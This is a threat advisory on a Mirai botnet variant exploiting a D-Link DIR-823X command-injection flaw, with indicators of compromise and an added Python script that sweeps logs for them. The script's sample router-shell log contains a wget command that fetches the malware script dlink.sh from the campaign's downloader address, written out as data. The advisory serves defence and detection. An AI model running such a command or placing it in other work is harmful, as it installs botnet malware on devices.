Active Mirai Botnet Campaign Exploits D-Link Router Vulnerability
Researchers have identified an active campaign in which the Mirai botnet exploits CVE-2025-29635, an OS command-injection vulnerability in legacy D-Link DIR-823X routers. Attackers use it to compromise internet-exposed devices and recruit them into a distributed denial-of-service (DDoS) botnet run by a Mirai variant called "tuxnokill."
The campaign centers on CVE-2025-29635, an OS command injection flaw rated CVSS 7.2 (high). The attack consists of a specially crafted POST request to the router's /goform/set_prohibiting endpoint; because the handler does not sanitize the request's input, the attacker can execute arbitrary operating-system commands on the device. After initial exploitation, the attacker downloads a shell script named dlink.sh, which installs the Mirai payload and turns the router into a bot.
Exploitation is automated, so any vulnerable router reachable from the internet can be compromised without any user interaction. The malware is compiled for ARM, MIPS, x86, and x86_64, so it can infect devices across the range of CPU architectures found in IoT environments. Once running, it decodes its embedded configuration and connects to its command-and-control (C2) server, which then directs the device to participate in DDoS attacks.
Defensive Context
Organizations with D-Link DIR-823X routers in their network infrastructure should treat this botnet activity as an active, ongoing threat. Routers with direct internet exposure are the most at risk and should be prioritized for immediate action, which for a legacy device without a vendor fix means removing it from direct internet exposure or replacing it. Enterprises whose routers are not affected by CVE-2025-29635, or whose devices already sit behind sound perimeter controls, likely need no specific action beyond a one-time check for the indicators listed below.
Why This Matters
The campaign underscores the sustained risk to networks that rely on outdated or unsupported hardware for which security updates are no longer issued. Organizations still deploying these D-Link devices face a pronounced likelihood of compromise, especially where IoT devices are not segmented from the rest of the network.
Defender Considerations
Organizations should monitor for outbound connections to 88.214.20.14 (the payload download host) and to 64.89.161.130 on port 44300 (the C2 server). Detection should also cover inbound POST requests to /goform/set_prohibiting on exposed routers, downloads or execution of dlink.sh and related scripts, and unusual outbound traffic volumes consistent with the flooding behavior typical of Mirai-driven DDoS activity. Any occurrence of dlink.sh should be flagged for review as a possible compromise.
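As an added example, not tooling from the researchers or from this advisory, the following Python sweep applies the indicators listed below to a few log sources at once: firewall connection logs, the router's HTTP access log, shell-command telemetry and a file-hash inventory. The indicator values are copied from the IOC list; the log formats, the hostnames and the sample log lines are constructed for illustration (documentation-range addresses stand in for internal hosts), so the regexes are assumptions to adapt to your own sources.

```python
"""Offline IOC sweep for the tuxnokill/Mirai campaign described above.

Added example, not the advisory's tooling. Indicators come from the advisory's
IOC list; every log format and log line here is constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators from the advisory.
DOWNLOADER_IP = "88.214.20.14"
C2_IP, C2_PORT = "64.89.161.130", 44300
VULN_ENDPOINT = "/goform/set_prohibiting"
SCRIPT_NAME = "dlink.sh"
SAMPLE_SHA256 = {
    "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8",
    "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100",
    "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b",
    "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7",
    "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8",
}


def _ip_pattern(ip: str, port: int | None = None) -> re.Pattern[str]:
    """Match an IP as a whole token, so 188.214.20.14 or 88.214.20.145 do not hit."""
    pat = r"(?<![\d.])" + re.escape(ip)
    if port is not None:
        pat += ":" + str(port)
    return re.compile(pat + r"(?!\d)")


DOWNLOADER_RE = _ip_pattern(DOWNLOADER_IP)
C2_HOST_RE = _ip_pattern(C2_IP)
C2_HOST_PORT_RE = _ip_pattern(C2_IP, C2_PORT)
HTTP_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")


@dataclass(frozen=True)
class Hit:
    source: str
    rule: str
    line: str


def check_line(source: str, line: str) -> list[Hit]:
    """Return one Hit per indicator rule the line trips (a line can trip several)."""
    hits: list[Hit] = []
    if DOWNLOADER_RE.search(line):
        hits.append(Hit(source, "downloader_ip", line))
    if C2_HOST_PORT_RE.search(line):
        hits.append(Hit(source, "c2_ip_and_port", line))  # strongest network signal
    elif C2_HOST_RE.search(line):
        hits.append(Hit(source, "c2_ip", line))  # host only; still worth triage
    req = HTTP_REQ_RE.search(line)
    if req and req["method"] == "POST" and req["path"].split("?", 1)[0] == VULN_ENDPOINT:
        hits.append(Hit(source, "post_to_vulnerable_endpoint", line))
    if SCRIPT_NAME in line:
        hits.append(Hit(source, "dlink_sh_reference", line))
    for digest in SHA256_RE.findall(line):
        if digest.lower() in SAMPLE_SHA256:
            hits.append(Hit(source, "known_sample_hash", line))
    return hits


def scan(logs: dict[str, list[str]]) -> list[Hit]:
    """Sweep several sources at once; keys are source names, values are raw lines."""
    return [h for src, lines in logs.items() for ln in lines for h in check_line(src, ln)]


# Constructed sample logs (not real captures). The assumed formats: a key=value
# firewall log, a combined-style router access log, shell telemetry with a
# cmd="..." field, and a path/sha256 inventory. 192.0.2.x, 198.51.100.x and
# 203.0.113.x are documentation ranges standing in for internal hosts and peers.
SAMPLE_LOGS = {
    "firewall": [
        "2025-05-02T10:14:07Z fw allow out src=192.0.2.10:51234 dst=203.0.113.7:443 proto=tcp",
        "2025-05-02T10:14:09Z fw allow out src=192.0.2.10:51235 dst=88.214.20.14:80 proto=tcp",
        "2025-05-02T10:14:15Z fw allow out src=192.0.2.10:51240 dst=64.89.161.130:44300 proto=tcp",
    ],
    "router_http": [
        '198.51.100.23 - - [02/May/2025:10:14:08 +0000] "POST /goform/set_prohibiting HTTP/1.1" 200 12',
        '198.51.100.23 - - [02/May/2025:10:14:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    ],
    "router_shell": [
        'host=rtr1 cmd="wget http://88.214.20.14/dlink.sh -O /tmp/dlink.sh"',
    ],
    "file_inventory": [
        "path=/tmp/.x sha256=72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8",
        "path=/bin/busybox sha256=" + "0" * 64,
    ],
}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"[{hit.source}] {hit.rule}: {hit.line}")
```

The IP patterns deliberately reject partial matches (a neighbouring address such as 88.214.20.145 must not page anyone), and a C2 host seen on a port other than 44300 is reported as a weaker, separate rule rather than dropped. The flooding behaviour mentioned above is volumetric and needs rate-based logic over flow records, which this per-line matcher does not attempt.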
Indicators of Compromise (IOCs)
- Downloader IP: 88.214.20.14
- C2 Server: 64.89.161.130:44300
- Malware Name: tuxnokill
- Download Script: dlink.sh
- Vulnerable Endpoint: POST /goform/set_prohibiting
- SHA256 Hashes:
  - 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
  - 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
  - be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
  - d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
  - 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8